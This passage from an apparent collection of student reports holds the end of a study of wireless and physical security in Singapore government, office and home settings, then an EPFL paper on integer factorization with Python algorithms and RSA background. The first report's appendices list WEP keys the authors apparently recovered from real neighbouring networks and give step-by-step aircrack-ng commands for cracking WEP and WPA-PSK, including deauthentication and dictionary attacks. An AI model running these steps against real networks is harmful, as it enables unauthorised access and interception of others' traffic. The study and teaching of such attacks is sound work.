of at least one security guard. This is to prevent the chips which are being manufactured to be taken out and leaked to their competitors. However, unlike in DSO, UTAC have wireless connection within the building. WPA is used as the form of encryption for their wireless connection. Furthermore, the username and password to the wireless connection is not known to all employees. It is given out on a need to know basis. Also, the username used to access the network is linked to their company profile, hence their rights to the internet is limited to what is given to them through their individual company profile. This point will be further discussed below. Although it appears that thoughts have been given to wireless security, UTAC have a second wireless connection for visitors. This second network does not have encryption. The username and password are also freely given out. Add on the face that there is totally no restriction for users on what they can do using this network and it looks like the wireless security of UTAC is very easily compromised. However, one can’t help but wonders if this network is deliberately set up in such a manner so as to allow visitors to easily access the internet and in actual fact, security measures such as separating this network from the company network via demilitarized zone (DMZ) are in place. What exactly has or has not been done regarding this second wireless network has not been disclosed to us. As earlier mentioned, each employee has an individual profile in the company network. This is to control access to files and folders on the company network. Each department has a shared virtual drive to save their work. The profile of an individual will determine which files he has access to. Internet access are also based on this profile with most employees having no internet access at all, some having limited access to view limited websites and only a few have full internet access. Desktop security is another aspect which to take note of. UTAC has a centralized firewall using Symantec software running on every PC in the building. This software is centrally administrated on a server and updates are passed on to the PCs every night. In addition, the Symantec software is also used to prevent the use of thumb drive and other storage devices on the PC. Lastly, UTAC has a policy of no thumb drive and external storage devices to be carried in and out of UTAC premises. Exceptions can be made by requesting to the IT department and upon approval; a sticker will be given to be pasted on the approved device. Laptops are subjected to the same policy. This policy is also upheld by the metal scanner which everyone has to pass to exit the building. The security guard will also request to look into the bags of all who exits the building. 4.3 Comparison of firms As we can view from the above two cases there are several differences in the security policy. The first is that one firm‘s employee are allow to use external storage devices 62 while the other don’t. This is due to the differentness in company structure and the available of intranet in UTAC while not in English Corners. Employee of UTAC would be able to transfer their files within the organization while English Corners’ have to rely on the use of thumb drive or email to transfer or share files. The policy of not using external hard drive is to prevent employee from stealing information out of the company. Therefore from this point we could see that UTAC have a higher security policy over English Corners over the protection of their data. In addition English Corner allows all employees to have access to all file and the ability to make changes to them. Whereas in UTAC, employees are only allows to views the level of documents according to their profile level. 5 Compare and Contrast of the various environments In view of our research, we could see the deployment of different security level policy in the three different environments namely the Government, Office and the Home environment. As reviewed the government requires the highest security environment due to the nature of the data it contained and handled. Office and home environment on the other hand are less secured due to its nature, technical knowledge of individuals and the support given. Government environment uses wired connection despite the availability of the new wireless technology because the technology still contain vulnerability that could be exploited and so wired network are used to prevent unauthorized personnel from intercepting packets transmitting over the air which can be done easily in the case of wireless connection. However, wired connection used by Singapore government’s institute emit electromagnetic radiation. Further prevention measures are taken to prevent the tapping of wired cable such as more surveillance cameras are installed to look out for suspicious activities. In general, both office and government environment have security guard in the compound to conduct check on employee and visitor to screen out suspicious or unauthorized items being brought into the area. However, most companies allow employees to bring camera phone with the exception of Government agencies such as Mindef and DSO where their employees are prohibited from bringing camera phone. Failure to comply with the camera phone ban will result in severe punishment in Mindef and DSO. For example, an intern from DSO caught with a camera phone may get dismissed from DSO as punishment or employee from Mindef related institute such as SAF will get charge in martial court for bringing camera phone. In contrary to home environment, wireless network are enable in individual home because most of their modem and router that came in a bundle when they signed network contract with the network providers and these modem and router usually have wireless capability and are turn on on default. Moreover, enable wireless could means more convenient to access Internet anywhere in the home and also could reach to more users. The security of different individuals in home environment varies due to their technological knowledge. However, many of the home users uses the default security setting to protect their wireless network. For older router and modem, the 63 default security setting is WEP, which has flawed and already broken so anyone will be able to break into these home networks easily. 6 Limitations During our research we face certain limitations. One limitation would be the lack of information that we can gathered over the Internet for the Government environment. The only information we got for our case study (DSO) is provided by one of our authors who managed to work in the government institute as an intern. However, we are still quite restricted in the information we can get from DSO since the privilege or access permission given to the intern is only restricted to the project assigned to them. Hence, the information gathered from the intern may only be the tip of the iceberg where there might more security measures being employed that we might not discover. In addition, interns are required to sign a non-disclosure agreement where they will not disclose confidential information about the project and the structure and layout of the building they are working in. Therefore, this will limit in the scope of what we could write in the report. Another limitation we face during our research on the home environment would be that we are required to be stationed near the targeted network to prevent packets lost and deter us from sniffing for network vulnerability. Therefore we would require multiple Access Points to be available near the vicinity in order for cracking. In addition there is a limitation to the dictionary attack we perform in cracking the passwords as we do not have a supercomputer that can handle the generation of possible results quickly we are only able to crack only those more commonly use English words or known passwords which are relatively short. 7 Conclusion From our research, the government has adopted more comprehensive and restrictive policies, standards and procedures for ensuring it maintains a secured infrastructure for transmitting sensitive information. The security around government’s institute is generally adequate, but it may seem too rigid in certain measures which may result in inconvenient and unhappiness among employees. The office environment employ different standard of security policy between different firms. Some companies would have a higher security policy. For example, wireless network security at office such as English Corner may not be adequate. As such, improvements in some areas are needed like a more enhanced policies and standards in wireless networking, strengthening some of the management and monitoring of wireless operating activities, as well as using WPA as their security key for wireless connection. In addition we would suggest the use of intranet for the sharing of files and have files access level to prevent unauthorized access of confidential files. The default security key uses in the home environment should be change to WPA so as to allow individuals to enjoy a higher secure network in their home. ISP should 64 step in and aid to help their customers to either guide them in changing to a higher setting of WPA instead of WEP on existing ones or pursue them to upgrade to a newer router or modem. Moreover, ISP should also help their customers in securing the administrator page to a better protection mechanism in these devices to future deter intrusion. This would allow less IT savvy users to enjoy higher protection while using wireless network within their home environment. References 1) Robert,J,B.(2002).Wireless Security: An Overview. Retrieved 30 October, 2011, from http://www.washburn.edu/faculty/boncella/WIRELESS-SECURITY.pdf 2) Nikita,B, Ian, G. David, W. Intercepting Mobile Communications: The Insecurity of 802.11.(n.d.) Retrieved 30October, 2011 from http://www.isaac.cs.berkeley.edu/isaac/mobicom.pdf 3) Aircrack-ng Retrieved from http://www.aircrack-ng.org/ 4) Infocomm Development Authority Of Singapore. (2006). Singapore: A World Class eGovernment. Retrieved 30 October, 2011, from http://www.ida.gov.sg/doc/Infocomm%20Industry/Infocomm_Industry_Level1/Gov%20Bro chure.pdf 5) Lee,M,K.(2007, July 27).Malaysian Govt bans camera phones. Retrieved 30 October,2011 from http://www.zdnetasia.com/malaysian-govt-bans-camera-phones-62029540.htm 6) Munir,K. (2003, September 13). Jamming device aim at camera phones. Retrieved 30 October,2011 from http://www.zdnetasia.com/jamming-device-aims-at-camera-phones39150860.htm 7) Bob,B. (2008, November 21). Defense bans use of removable storage devices.Retrieved 30 October,2011 from http://www.nextgov.com/nextgov/ng_20081121_2238.php 8) Joanne,R. (2008, May 15). Wired vs Wireless: Sometimes There’s no Substitute for a Cable. Retrieved 30 October, 2011 from http://www.osnews.com/story/19748/Wired_vs_Wireless_Sometimes_There_s_No_Substitu te_for_a_Cable/page2/Asd 9) Borys,P. (2001, February). Tempest. Retrieved 30 October from http://searchsecurity.techtarget.com/definition/Tempest 10) U.S. Army Corp of engineers, Publication Department. (1990, December 31).Electromagnetic Pulse (EMP) and Tempest Protection for Facilities. Retrieved 30 October, 2011 from http://cryptome.org/emp08.htm 65 Appendix A Table 1 – Found keys of WEP network BSSID ESSID CHANNEL KEY FOUND 00:1A:70:95:6A:C6 ruiqi 11 18:06:19:81:88 00:C0:CA:1D:51:D4 WLAN-11g-AP 1 64:69:76:65:72 00:1F:B3:63:46:89 2WIRE092 6 21:53:38:13:27 00:16:B6:33:9A:B0 hairi 6 93:80:83:14:00 00:23:51:AB:40:71 2WIRE687 6 84:39:27:86:29 Table 2 – Detailed step for cracking WEP Wireless Network Steps 1 Function Enable wifi monitor mode Commands sudo airmon-ng start wlan1 2 Start network sniffing to select target AP. sudo airodump-ng mon0 3 Monitor specific network sudo airodump-ng -c <CHANNEL> --bssid <MAC ADDRESS> -w <FILE-NAME> mon0 4 Fake Authentication (Optional, if there is no available host connecting to AP) sudo aireplay-ng -1 6000 -o 1 -q 10 -e <ESSID> -a <BSSID> -h <fake BSSID> --ignore-negativeone mon0 5 ARP REQUEST REPLY ATTACK sudo aireplay-ng -3 -b <BSSID> -h<HOST / FAKE BSSIB> --ignore-negative-one mon0 6 Retrieved passphrase from the IV collected sudo aircrack-ng -b 00:1A:70:95:6A:C6 ruqi-01.cap 7 (Decrypting and viewing the whole network exchange with AP) sudo airdecap-ng -w <passphrase key> <captured network file name, e.g.:“2WIRE687-01.cap”> (decrypting) sudo tcpdump -r <decrypted network file name> -i mon0 (viewing) Table 3 – Detailed step for cracking (WPA/WPA2) - PSK Wireless Network Steps 1 Function Enable wifi monitor mode Commands sudo airmon-ng start wlan1 66 2 Start network sniffing to select target AP. sudo airodump-ng mon0 3 Collect authentication 4-ways handshake for the targeted AP sudo airodump-ng -c 6 --bssid <BSSID> -w <file name to be save> mon0 4 client who is already connected to the AP sudo aireplay-ng -0 500 -a <AP MAC ADDRESS> -c <Client MAC ADDRESS> --ignore-negative-one mon0 5 Check if the handshake is being captured sudo aircrack-ng <file name> 6 Dictionary Attack on the handshake captured file sudo aircrack-ng -w password.lst -b <AP MAC ADDRESS> <file name> Appendix B Figure 1 – List of available wireless network (Location A) 67 Figure 2 – List of available wireless network (Location B) Figure 3 – Aircrack-ng on WEP for ruiqi Network 68 Figure 4 – Plain texts (Decrypted) packets for ruiqi Network Figure 5 – Aircrack-ng on WEP for WLAN-11g-AP Network 69 Figure 6 – Aircrack-ng on WEP for 2WIRE092 Network Figure 7 – Aircrack-ng on WEP for 2WIRE687 Network 70 Figure 8 – Aircrack-ng on WEP for hairi Network Figure 9 – Plain texts (Decrypted) packets for hairi Network 71 Figure 10 – WPA-PSK 4-way handshake monitoring for Remyidah network Figure 11 – Dictionary attack on the obtained handshake for Remyidah Network 72 Figure 12 – WPA-PSK 4-way handshake and Dictionary attack for Linksys network Figure 13 – Router homepage for 2WIRE687 network 73 Figure 14 – Router homepage for hairi network Figure 15 – Router’s firewall for hairi network 74 Appendix C Figure 16 – Survey Respond 1 75 Figure 17 – Survey Respond 2 76 Figure 18 – Survey Respond 3 77 Figure 19 – Survey Respond 4 78 Figure 20 – Survey Respond 5 79 Figure 21 – Survey Respond 6 80 Figure 22 – Survey Respond 7 81 Figure 23 – Survey Respond 8 82 Figure 24 – Survey Respond 9 83 Figure 25 – Survey Respond 10 84 Figure 26 – Survey Respond 11 85 Figure 27 – Survey Respond 12 86 Figure 28 – Survey Respond 13 87 Figure 29 – Survey Respond 14 88 Figure 30 – Survey Respond 15 89 Figure 31 – Survey Respond 16 90 Figure 32 – Survey Respond 17 91 Figure 33 – Survey Result 1 Figure 34 – Survey Result 2 92 Figure 35 – Survey Result 3 Figure 36 – Survey Result 4 93 Figure 37 – Survey Result 5 94 Integer Factorization Romain Edelmann [email protected], Jean Gauthier [email protected], and Fabien Schmitt [email protected] École Polytechnique Fédérale de Lausanne Abstract. In this report, we discuss about the factorization of integers, a major problem closely related to cryptography and arithmetic, starting with a brief history of the subject, and mathematical background. Then we will discuss the motivation behind factorizing numbers. The problem is then analyzed within complexity theory in terms of feasibility and complexity. Various algorithms are then presented and some implemented using Python. Keywords. Integer factorization, prime factors, cryptography, public key systems, RSA, complexity theory, algorithm, Fermat’s factorization method, Pollard’s factorization method, Shor’s algorithm. 1 Introduction Integer factorization is the decomposition of a number into its prime divisors. As we shall see all along this report, this problem is very important in a number of fields, including cryptography. The problem might seem easy to solve at first, but in fact it gets much harder as numbers get big. 2 History Integer factorization and prime numbers are closely related subjects and have been studied for a very long time. [1] In Ancient Greece already, Euclid studied prime numbers and demonstrated some of their fundamental laws, such as the infinitude of primes and the fundamental theorem of arithmetic. Prime numbers were also taught in the Pythagoras’s school, and Eratosthenes tried to find some of their principles. Later, in 1640, Pierre de Fermat, a French mathematician developed his Fermat’s little theorem, however without proving it. Less than hundreds years later, Leibniz and Euler proved it. Euler also developed many functions and theorem in Number Theory, such as Euler’s totient theorem, which is the generalization of the Fermat’s little theorem. Finding the prime numbers remained hard, but at the beginning of the 19th century, Gauss found a formula to show that the density of the prime numbers is 95 asymptotic. Other mathematicians tried to create some tests to define if an integer is prime or not, including Lucas who created his test in 1876 and found the greatest prime number found without a computer. His test would be improved by Lehmer in 1930 and is still in use nowadays. In the 1970’s, with the expansion of the networks, scientists finally found a practical application for prime numbers : the public key cryptography. Until that day all the encryption were symmetric. In 1976, Diffie and Hellman invented the first public key encryption, followed by Ronald Rivest, Adi Shamir and Leonard Adleman, who invented in 1978 a new public key crypto-system, named after them, RSA. Based on prime numbers properties and factorization, RSA is still widely used nowadays. [2] 3 Important Mathematical Properties Before proceeding to the rest of the report, it is important to see some of the very important mathematical properties used in integer factorization. This section reviews theorems and definitions that are used throughout this paper. Since the vast majority of the subsequent propositions are well-known results from basic algebra and number theory that can be found in any good algebra or mathematics book[3][4], the proofs have not been included in this section. The theorems are hence formulated as propositions. Definition 1. If a and b are integers, a 6= 0, then a divides b, if there is an integer c such that a · c = b. This is written as a|b. In this case, a is a factor of b and b a multiple of a. If a does not divide b, we write a 6 | b. Definition 2. A positive integer n greater than 1 is called prime if the only positive factors of p are 1 and p. Definition 3. If a positive integer greater than 1 is not prime, it is called composite. Definition 4. The largest integer g such that g|m and g|n, where m and n are both nonzero, is called greatest common divisor of m and n and is denoted by gcd(m, n). Definition 5. If a number m is such that gcd(m, n) = 1 for a given n, then m is said to be coprime or relatively prime to n. Proposition 1 (Fundamental Theorem of Arithmetic). Every positive integer greater than 1 can be written as a prime or a product of primes in a unique way, up to the order of its factors. Proposition 2. √ Let n be a composite integer. Then n has a prime divisor less than or equal to n. Definition 6. Two integers a and b are congruent modulo n if n|(a − b). Formally, this is written as a ≡ b mod n. If a and b are not congruent modulo n, we write a 6≡ b mod n. 96 Definition 7. An integer a−1 which satisfies the congruence relation a · a−1 ≡ 1 mod m is called modular multiplicative inverse modulo m or simply the inverse of a. a−1 exists if and only if gcd(a, m) = 1. Proposition 3 (Bézout’s identity). For every nonzero integers a and b, there exists two integers x and y such that: ax + by = gcd(a, b). (1) Proposition 4 (Euclidean algorithm). After the following steps, rk+1 is gcd(a, b) : r0 := a, r1 := b (2) r0 = q0 · r1 + r2 (3) r1 = q1 · r2 + r3 (4) ... rk−1 = qk−1 · rk + rk+1 (5) rk = qk · rk+1 (6) Proposition 5 (Extended Euclidean Algorithm). The following substitutions solve Bézout’s identity, according to the computations done in Euclid’s algorithm. Furthermore, x is the multiplicative inverse of a mod b: rk+1 = rk−1 − qk−1 · rk (7) rk+1 = rk−1 − qk−1 · (rk−2 − qk−2 · rk−1 ) (8) rk+1 = −qk−1 · rk−2 + rk−1 · (1 + qk−1 · qk−2 · rk−1 ) (9) ... rk+1 = x · a + y · b (10) At each step, the ri with the highest index on the right-hand side of the equation is substituted by using the equation ri−2 = qi−2 · ri−1 + ri . The computation is stopped when rk+1 is expressed in terms of a linear combination of a and b. Definition 8 (Eulers Phi Function). The function ϕ(n) which is defined as being the number of positive integers less than or equal to n that are coprime to n is called the totient or Euler’s phi function of n. ϕ(n) = n Y 1 (1 − ) p p|n where p are all the prime factors of n. Corollary 1. If p and q are primes, then ϕ(p · q) = (p − 1) · (q − 1). 97 (11) Proposition 6 (Fermat’s little theorem). If p is prime, then for any integer a, we have ap ≡ a mod p. Alternatively, if gcd(a, p) = 1, then ap−1 ≡ 1 mod p. Proposition 7 (Euler’s theorem). If n and a are coprime integers, then aϕ(n) ≡ 1 mod n. This theorem is a generalization of Fermat’s little theorem. Proposition 8. Every odd integer can be written as a difference of two perfect l−m 2 2 squares. Furthermore, if lm is a factorization of n, then n = [ l+m 2 ] − [ 2 ] is such a difference. 4 Motivation The prime factorization is widely used in the scientific world : in cryptography, of course, but also in algorithmic and in image processing. Every number has a unique prime factorization. Having two or more numbers, and knowing their prime factors allows to discover quickly their greatest common divisor, least common multiple or square root. Based on this property, many researches are still in progress to find the prime factorization faster. [5] 4.1 Cryptography Factorization of Large Integers If we have two big prime numbers, it’s really easy to obtain their product. But from this product, it’s reasonably impossible to find its prime factorization[6]. This problem is the base of the actual public key cryptography[7], widely use in the network security. Public Key Cryptography The main principle of public key cryptography is to create a function that is easily computable but hardly invertible. So the persons who want to send you a secret message can encrypt it with your public key, which is accessible by everyone on the network. But without the private key, that remains secret for anybody but you, it’s almost impossible to decrypt the message. [7] The Example of RSA (Rivest Shamir Adleman) In cryptography, one of the widely used system in the Internet is the RSA crypto-system[7]. This public key crypto-system is based on the difficulty of finding the two prime factors of a huge number. Let’s take the case of Bob who wants to send a message to Alice, without anyone but Alice being able to read that message. First of all, let us see how Alice does create her public and private keys. – Alice chooses two big prime numbers, p and q that she keeps private. Then she can compute their product n = p ∗ q. 98 – Alice now computes the Euler’s phi function of n. ϕ(n) = (p − 1) · (q − 1) (12) One of the key things to understand, is that Alice can very easily calculate this function, because, in contrary to anybody else, she knows p and q, the prime factors of n. – Then Alice chooses a number e relatively prime to ϕ(n) and calculate its inverse d modulo ϕ(n). d ≡ e−1 mod ϕ(n) (13) In order to compute this d, Alice can use the Extended Euclidean Algorithm. – Alice now publishes the pair (n, e) as a public key, and keeps d secret. If Bob wants to send confidentially a message M to Alice, he can use the public key of Alice in order to perform the following computation: E ≡ M e mod n (14) and then send the computed cypher-text E to Alice. When she receives the cyphertext, Alice can retrieve the original message performing the following computation: M ≡ E d mod n (15) The fact that M is recovered from this computation follows from Euler’s Theorem. Attack Using Integer Factorization Let now imagine that a hacker, named Trudy, was able to read the encrypted messages from Bob to Alice. What Trudy knows is the following: – The public key of Alice, that is to say n and e. – The cypher-text E. The only thing that prevents Trudy from decrypting the cypher-text is that she is not able to compute the Euler’s phi function of n. If a fast way to decompose n into its prime factors p and q was known by Trudy, she could very easily compute ϕ(n) and d using exactly the same way Alice used herself, and therefore be able to decrypt E to the original message M . Here lies the principal motivation behind integer factorization. 5 Theoretical Computer Science Approach In order to analyze integer factorization more formally in terms of feasibility and complexity, we will need to introduce briefly the theory of complexity. This section is intended as a very short introduction to this theory. It is a wide area of study and readers interested in the subject can refer to various authoritative books, like Introduction to the Theory of Computation by M. Sipser [8], which is the reference book used throughout this chapter. 99 5.1 Complexity Theory Complexity theory is an area of the theory of computation. The theory is about classifying problems according to the difficulty to compute a solution for them. Some problems are easy, like sorting a list of integers, and some are hard, like deciding whether or not the free variables in a boolean formula can be assigned such that the formula evaluates to true. Complexity theory plays a central role in modern cryptography. Many codes nowadays rely on the computational difficulty of decrypting a cipher without the key. The following subsections are a short introduction to the complexity theory. 5.2 Problems A problem can be described formally as a question in some formal language about some input. A kind of problems, which are easier to reason about, are the decision problems. The answer to a decision problem given a certain input is always Y ES or N O. For example, the question ”Is n prime?” with n an input number, is a decision problem called P RIM E. Another kind of problems, the functions problems have not their output limited to Y ES or N O. 5.3 Turing Machines A Turing machine is an abstract model of a computer first introduced by Alan Turing in 1936. Anything that a computer can compute, so can a Turing machine. It consists of an infinite tape as memory and a read-write head moving left or right on the tape. In order to control this, this abstract machine has a finite number of states and a transition function, which, given a state and the symbol under the head, will return three instructions: a new state, a symbol to replace the read symbol with on the tape and where to move the head, left or right. The machine contains three special states. The first one is an initial state, which is, unsurprisingly, the state on which the machine starts. The two others are an accepting state and a rejecting state. In both cases, when the machine reaches one of these states, it stops. The input given to the machine is placed on the tape before any computation is made. Textual Description of Turing Machines. Giving such precise description of a Turing machine is unwieldy, due to all the details. For the rest of the report, we will give only a higher-level text description of what the Turing machine does, when we need to describe one. Given a description, it is possible to convert it to the formal description we’ve just described. 100 Language of a Turing Machine. The language of a Turing machine is defined as the set of all inputs on which the machine will accept, that is to say all the strings of symbols which would lead the Turing machine to the accepting state. Non-deterministic Turing Machines. A non-deterministic Turing machine is much like a normal Turing machine, except for the transition function. Instead of just giving on set of the three instructions (new state, new symbol and direction), it can give many of them. The machine can be seen as making the non-deterministic choice of which one to execute in order to, if possible, go to the accepting state. 5.4 Complexity Classes The complexity classes are a way to classify problems in terms of difficulty of computation. In order to classify a problem, one need to find a corresponding Turing machine whose language is the set of solutions to the problem, encoded in some alphabet. If we take a look at the P RIM E problem, we can find a Turing Machine, that we will call P rime, that will accept for instance all the binary representations of prime numbers. The P Class. Two very important classes in practice are the famous P and N P classes. A problem is in P if it is possible to find a Turing machine that will accept all the solutions to the problem and reject all the others, in polynomial time. By polynomial time, it is meant that the time of computation is bounded by a polynomial depending on the size of the input. Intuitively, the problems feasibly computable on a computer are part of P , like for instance sorting a list of integer or getting the greatest common divisor of two numbers. This is known as the Cobham thesis. [9] The problem of deciding if a number is prime has been proven to be in P in 2004.[10] The N P Class. The N P class is the same as the P , except that the deterministic Turing Machines are replaced by non-deterministic ones. All problems in P are also naturally within N P . It is not known if there exists problems that are in N P but not in P , this is the famous question of P = N P . One can prove that a problem is in N P by verifying a given certificate along with the input. We will use that method later on to prove that the factorization problem is in N P . N P - Complete Problems. A certain subset of N P is known as the N P complete problems. A Turing machine solving a N P - complete problem can be reduced to another Turing machine of equivalent complexity solving any given N P problem. That means that if one can find a Turing machine, or an algorithm, that solve any of the N P -complete problem in polynomial time, we can find a feasible way to compute any of the N P - problem. 101 5.5 The Integer Factorization Problems The integer factorization can be stated as a function problem, meaning that given any integer, a unique output, the list of prime factors, is expected. But this problem is equivalent to the following decision problem: Given two integers, n and k, is there an integer m such that 1 < m < k and m divides n. 5.6 Integer Factorisation in N P The integer factorization problem falls in N P , the class of problems solved in polynomial time by a non-deterministic Turing machine. As stated earlier, a problem is in N P if and only if a certificate, or solution, can be verified in polynomial time on a deterministic Turing machine. This is the fact used in the following proof. It is also important to keep in mind that the complexity is calculated from the input length. If a number n is to be passed to the machine, it first needs to be encoded in a given alphabet. The size of the input is of the order of log(n) for a number n. Proof. For the proof, we will simply define a Turing machine that verifies a solution of the factorization of n, p1 to pk being the supposed prime factors of n. FactorVerifier(<n, p1 , p2 .. pk >) Begin acc := 1 For f := p1 , p2 .. pk : If Prime(f) rejects, REJECT acc := acc * f If acc = n : ACCEPT Else : REJECT End End This deterministic Turing machine verifies in polynomial time that n is indeed the product of the primes p1 to pk. This Turing machine uses an other Turing machine, P rime, in order to test in polynomial time if a number is prime. As stated earlier, P RIM E is in P . 5.7 Relation to Other Complexity Classes It is widely believed that this problem is not N P - complete. However, no proof of this fact has been done so far. It is closely related to the P = N P question, which has never been proven or disproven. 102 As a N P problem, we don’t know if it is possible to have a polynomial time algorithm to solve integer factorization. But finding a polynomial time algorithm that solve any of the N P - complete problem would mean that integer factorization is also feasible in polynomial time and would compromise greatly the security of public key cryptography systems ! 6 6.1 Algorithms for Integer Factorization Big O Notation When discussing about complexity of algorithms, we will use the Landau notation, known as the Big O notation. f (n) ∈ O(g(n)) ⇐⇒ ∃k > 0, m ∈ N(∀n > m ∈ N(f (n) ≤ g(n) · k)) (16) What it means is that if f (n) ∈ O(g(n)) then f (n) does not grow faster than g(n). In other words, f (n) is bounded by g(n). 6.2 Trivial Factorization Algorithm Core Ideas. This algorithm is the most naive method to factorize an integer n into a product of primes. What is done is starting at i = 2, and seeing √ whether i|n. If yes, we repeat this step. If no, we increment i until it reaches b nc. This algorithm is deterministic and proves whether n is prime or not: if the only returned factor is n, then n is prime. Otherwise, n is composite and the list of its factors is returned. Implementation in Python. def trivialFactorization(n): factors = [] ncurr = n for i in range(2, floor(sqrt(n))): while ( ncurr % i == 0 ): factors.append(i) ncurr/=i factors.append(int(ncurr)) return factors 103 √ Running Time. In the √ worst case, the only factors of n are n. Hence, √ the algorithm will perform O( n) modulos (divisions) since every integer up to n is tested. Each division can be √ performed in O(log(n)) [11]. This leads to the overall worst-case complexity O( nlog(n)). When considering the number of bits m of n, the running time is O(m · em/2 ). While this running time is acceptable for small numbers or integers with small factors, the algorithm becomes totally impractical when trying to factor a large number with large prime factors. √ Improvements. There is no need to check every integer up to O( n). A first improvement would be to leave out all even numbers after having repeatedly divided n by 2. We can further improve the algorithm by using Eratosthenes’ sieve, since we need only consider prime factors. 6.3 Fermat’s Factorization Algorithm Core Ideas. Fermat’s Factorization is based on the fact that every odd integer can be written as a difference of two perfect squares. The algorithm starts by factoring out all factors equal to 2. Then, an odd integer is left for factoring and Fermat’s method can be applied. The algorithm cycles through values for √ x, starting at d ne, and checks whether x2 − n = y 2 is a square. If it is the case, two factors of n have been found out, namely x + y and x − y. By applying this method recursively to the two factors, the decomposition of n into a product of primes can be achieved. Implementation in Python. def fermatFactorization(n): def fermatFactor(n): x = ceil(sqrt(n)) y2 = x**2 - n while round(sqrt(y2))**2 != y2: x+=1 y2 = x**2 - n return int(x - sqrt(y2)) factors = [] while n % 2 == 0: factors.append(2) n/=2 cfactor = fermatFactor(n) 104 if cfactor != 1: factors.extend(fermatFactorization(cfactor)) factors.extend(fermatFactorization(n/cfactor)) else: factors.append(int(n)) return factors Running Time. Fermat’s method is very effective when the factors to be found √ are close to n. In the worst case however, when√n is prime, the algorithm is even worse than the trivial algorithm, since O(n − n) = O(n) steps are needed. Expressed in terms of n’s size in bits m, the running time is O(2m ). Improvements. There are several simple improvements that can be added to the algorithm, in order to reduce its running time. The most straight-forward one combines Fermat’s algorithm with √ the trivial method. It sets a threshold √ t > n, uses Fermat’s method on d ne ≤ x ≤ t. and the trivial algorithm afterwards, knowing that only factors small than x − y have to be tested. Other improvements include a sieve-method where not all x’s are tried out in the equation x2 − n = y 2 .[12]. Fermat’s factorization method has been used as a basis for modern factorization algorithms, such as the quadratic sieve and the general number field sieve. 6.4 Pollard’s % Algorithm Core Ideas. The main idea in Pollard’s % algorithm is to generate two random numbers (0 ≤ x, y < n) by using a cyclic function, and hope their difference divides √n. The key observation is that, according to the birthday paradox, only 1.18 · n numbers have to be tested before finding a potential factor of n with a probability of 0.5. This algorithm may fail to find factors for a composite n. This happens since the random function image may not cover the whole interval [0, n[. In that case, the algorithm is repeated with another function than the usual f (x) = x2 + 1. (17) It has also to be noted that the algorithm fails on prime numbers, since (|x−y|, n) is always equal to 1 in that case. Implementation in Python. def pollardFactorization(n): f = lambda x: x**2 + 1 def gcd(a, b): 105 if b == 0: return a else: return gcd(b, a%b) def pollardFactor(n): x = 2 y = 2 z = 1 while x y z z = = = == 1: f(x) f(f(y)) gcd(abs(x-y), n) return int(z) m = pollardFactor(n) n = int(n/m) return [m, n] Running √ Time. Pollard’s %-algorithm has a complexity and standard derivation of O( n) or O(2m/2 ) where m is the number of bits in n, when a random mapping function is used. [13] Improvements. Several improvements to this factorization algorithm have been proposed over the years. They include different methods for cycle detection and not computing z at every iteration. [14] 6.5 Other Algorithms All the presented algorithms are so-called special-purpose factoring algorithms. This means that their running time does not depend solely on the size of the integer to be factored. Their actual running-time may depend on the size of the number’s factors (Trivial, Fermat, Pollard’s %), algebraic properties (Pollard’s % − 1), or other properties. Elliptic curve factorization is another well-known sub-exponential special-purpose factoring algorithm. [15] Inversely, general-purpose factorization algorithms depend uniquely on the size of the integer to be factored. These algorithms are the ones used in practice when trying to factor integers from RSA-crypto-systems. The general number field sieve is currently the fastest algorithm from this category when factoring large integers (typically above 100 digits). 106 7 7.1 Conclusion Current State of the Art In 2009, a team of researchers managed to a factor a 768 bits number (232 digits), using a cluster of PlayStation 3 over 2 years.[16] The number was known as RSA-768 and was proposed by the RSA Laboratories as part of a challenge. However, the challenge was canceled in 2007. It is still today the largest RSAnumber factored. Though this number was factorized, the security of the RSA systems are not compromised, as it would take the same amount of time to factor for any other number of that size that would be used for RSA. Moreover, the recommended size of numbers used for RSA is increasing with time. 7.2 Peek at the Future With the emerging quantum computers, the integer factorization could become a much simpler problem. In fact, there already exists an algorithm running in polynomial time on a quantum computer that computes the prime factors of any given number. This algorithm is known as the Shor’s algorithm.[17] In 2001, the number 15 was factored on a quantum computer using the Shor’s algorithm by researchers from IBM-Almaden and Stanford University.[18] Factoring this small might seem a derisory achievement, but in fact it is a major milestone in the field. It proves the feasibility of quantum computer and Shor’s algorithm in practice. If researchers find a way to increase the scalability of quantum computers, the end of most crypto-systems as RSA would be inevitable. 7.3 Final Words As we have seen throughout this report, the integer factorization is a very interesting problem, of great importance in various fields such as cryptography and complexity theory. It is also the perfect problem for quantum computers to work on. But most of all, the problem has practical life implications. Any efficient way to practically compute the prime factors of a huge number would have gigantic effects, as a huge number of systems relies on the difficulty of factoring big numbers for their security! References 1. Oystein Ore. Number Theory and Its History. Courier Dover Publications, 1988. 2. G. Bisson. Factorisation d’entiers, 2011. 3. Kenneth H. Rosen. Discrete mathematics and its applications. McGraw-Hill, Boston, 5th edition, 2003. 4. Joseph J. Rotman. First Course in Abstract Algebra. Prentice Hall, 2005. 5. N. Bourbaki. Éléments d’histoire des mathématiques. Masson, 1984. 6. S. Büttcher. Cryptography and security of open systems, factorization of large integers. Ferienakademie, 2001. 107 7. W. Stein. Elementary number theory: Primes, congruences, and secrets. 2011. 8. Micheal Sipser. Introduction to the Theory of Computation. Course Technology, 2005. 9. Alan Cobham. The intrinsic computational difficulty of functions. In Y. BarHillel, editor, Logic, Methodology and Philosophy of Science, proceedings of the second International Congress, held in Jerusalem, 1964, Amsterdam, 1965. NorthHolland. 10. Manindra Agrawal, Neeraj Kayal, and Nitin Saxena. PRIMES is in P. Annals of Mathematics, 2:781–793, 2002. 11. John D. Lipson. Newton’s method: a great algebraic algorithm. In Proceedings of the third ACM symposium on Symbolic and algebraic computation, SYMSAC ’76, pages 260–270, New York, NY, USA, 1976. ACM. 12. R. Lehman. Factoring large integers. Mathematics of Computation, 1974. 13. B. Luders. An analysis of the complexity of the pollard rho factorization method. 2005. 14. R. P. Brent. An improved Monte Carlo factorization algorithm. 1980. 15. H. W. Lenstra Jr. Factoring integers with elliptic curves. The Annals of Mathematics, 1987. 16. Thorsten Kleinjung, Kazumaro Aoki, Jens Franke, Arjen Lenstra, Emmanuel Thomé, Joppe Bos, Pierrick Gaudry, Alexander Kruppa, Peter Montgomery, Dag Arne Osvik, Herman te Riele, Andrey Timofeev, and Paul Zimmermann. Factorization of a 768-bit RSA modulus. Cryptology ePrint Archive, Report 2010/006, 2010. 17. Peter W. Shor. Algorithms for quantum computation: Discrete logarithms and factoring. In FOCS, pages 124–134. IEEE Computer Society, 1994. 18. Lieven M. K. Vandersypen, M. 